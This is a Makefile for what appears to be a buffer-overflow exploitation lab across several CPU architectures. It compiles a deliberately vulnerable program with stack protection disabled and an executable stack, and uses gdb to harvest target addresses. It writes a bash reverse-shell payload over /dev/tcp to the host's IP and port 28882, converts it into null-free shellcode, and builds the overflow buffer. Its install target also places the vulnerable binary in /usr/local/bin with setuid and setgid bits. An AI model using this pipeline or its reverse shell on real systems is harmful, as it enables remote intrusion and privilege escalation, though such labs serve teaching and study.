.PHONY: all clean install uninstall fullclean
.PRECIOUS:

NATIVE_ARCH=$(shell uname -m)
ARCH=$(NATIVE_ARCH)
OBJ_FILTER=cat
#Replace nops in mips bin with null-byte-free equivalents
MIPS_FILTER=xxd -ps -c4 | sed -e 's/^0\{8\}$$/27e0dead/' | xxd -r -ps



ifeq ($(ARCH), x86_64)
	PREFIX:=x86_64-linux-gnu-
else ifeq ($(ARCH), i386)
	PREFIX:=i686-linux-gnu-
else ifeq ($(ARCH), mips)
	PREFIX:=mips-linux-gnu-
	OBJ_FILTER:=$(MIPS_FILTER)
else ifeq ($(ARCH), mips64)
	PREFIX:=mips64-linux-gnuabi64-
	OBJ_FILTER:=$(MIPS_FILTER)
else ifeq ($(ARCH), riscv64)
	PREFIX:=riscv64-linux-gnu-
else ifeq ($(ARCH), aarch64)
	PREFIX:=aarch64-linux-gnu-
else ifeq ($(ARCH), arm)
	PREFIX:=arm-linux-gnueabi-
endif

ifeq ($(ARCH), $(NATIVE_ARCH))
	QEMU:=0
	PREFIX:=
else ifeq ($(ARCH).$(NATIVE_ARCH),i386.x86_64)
	QEMU:=0
else
	QEMU:=1
endif

ifeq ($(ARCH).$(NATIVE_ARCH),i386.x86_64)
	CC:=gcc -m32
	AS:=as --32
	OBJCOPY:=objcopy
	OBJDUMP:=objdump
else
	CC:=$(PREFIX)gcc
	AS:=$(PREFIX)as
	OBJCOPY:=$(PREFIX)objcopy
	OBJDUMP:=$(PREFIX)objdump
endif

GDB_PORT=8484

bins=mksploit call_shellcode vuln aslr_off testasm
DEFS=-DBUFF_SIZE=0x2000
CFLAGS=-std=gnu99 -g -fno-stack-protector $(DEFS)
LDLIBS=-L. -lreadfd
LDFLAGS=-Wl,-z,execstack
EFLAGS=

PAYLOAD=payload.sh

PAYLOAD_ASM=remotebashpayload


ip=$(shell hostname -I | awk '{print $$1}')
port=28882

all: $(bins) buffer

addr.txt: gdb.output
	sed < gdb.output -ne 's/.*0x/0x/p' > $@

gdb.output: vuln
	> $@
	@set -x ;\
	if [ $(QEMU) = 1 ] ; then \
		qemu-$(ARCH) -g $(GDB_PORT) $< /dev/null &\
		gdb-multiarch -batch -ex 'target remote localhost:$(GDB_PORT)' -ex 'set $$native = 0' -x coms-$(ARCH).gdb $< ;\
	else \
		gdb -batch -ex 'set $$native = 1' -x coms-$(ARCH).gdb --args $< /dev/null ;\
	fi
	
$(bins): libreadfd.a

libreadfd.a: readfd.o
	ar rcs $@ $<

buffer: mksploit payload.bin addr.txt
	./mksploit -a $(ARCH) `sed -e '2i-r' -e '1i-b' addr.txt` $(EFLAGS) payload.bin

payload-$(ARCH).h: $(PAYLOAD)
	./shell2asm.sh $< $(ARCH) > $@

payload.sh:
	printf 'bash 0<>/dev/tcp/%s/%s>&0 2>&0' $(ip) $(port) > $@

$(PAYLOAD_ASM)-$(ARCH).s: $(PAYLOAD_ASM)-$(ARCH).S $(PAYLOAD_ASM)-$(ARCH).labels.h payload-$(ARCH).h
	$(CC) -E -include $(word 2,$^) $< > $@

%.labels.h: %.labels.o.tmp
	$(OBJDUMP) -S $< | sed -ne 's/^0*\(\S\+\)\s*<\(\w*\)>:$$/#define \U\2 \L0x\1/p' > $@

%.labels.o.tmp: %.labels.s.tmp
	$(AS) $< -o $@
	
%.labels.s.tmp: %.S %.dummy-labels.h payload-$(ARCH).h 
	$(CC) -E -include $(word 2,$^) $< > $@

%.dummy-labels.h: %.S
	sed < $< -ne 's/^\s*\(\w\+\):.*/#define \U\1 0/p' >$@

payload.o: $(PAYLOAD_ASM)-$(ARCH).o
	cp $< $@

testasm: testasm.o payload.o

#$(CC) $^ -Wl,--omagic $(LD_FLAGS) -L/lib/aarch64-linux-gnu

%.bin: %.o
	$(OBJCOPY) -O binary -j .text $< /dev/stdout | $(OBJ_FILTER) > $@
	./check-null.sh $@

clean:
	rm -vf $(bins) buffer addr.txt libreadfd.a *.o *.bin *.s payload-*.h gdb.output *.tmp *.labels.h
install: vuln
	install -m 7755 $< /usr/local/bin/
uninstall:
	rm /usr/local/bin/vuln

fullclean: clean uninstall
